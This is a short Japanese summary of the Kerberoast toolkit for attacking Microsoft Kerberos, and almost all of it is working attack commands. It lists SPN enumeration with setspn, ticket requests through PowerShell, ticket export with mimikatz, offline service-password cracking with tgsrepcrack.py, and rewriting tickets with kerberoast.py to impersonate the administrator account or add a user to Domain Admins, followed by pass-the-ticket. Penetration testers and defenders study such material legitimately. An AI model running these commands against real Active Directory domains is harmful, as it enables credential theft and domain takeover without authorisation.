
MS Kerberos実装を攻撃するためのツールキット: SPNアカウントの抽出、チケットの要求とエクスポート、サービスパスワードの解析、なりすましや特権昇格のためのチケットの書き換え。
Kerberoastは、MS Kerberos実装を攻撃するための一連のツールです。以下は各ツールの機能の簡単な概要です。
PS C:\> setspn -T medin -Q */*
1枚のチケット:
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"
すべてのチケット
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
mimikatz # kerberos::list /export
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
ユーザーを別のユーザーに見せかける
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500
ユーザーを別のグループ(この場合はDomain Admin)に追加する
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512
kerberos::ptt sql.kirbi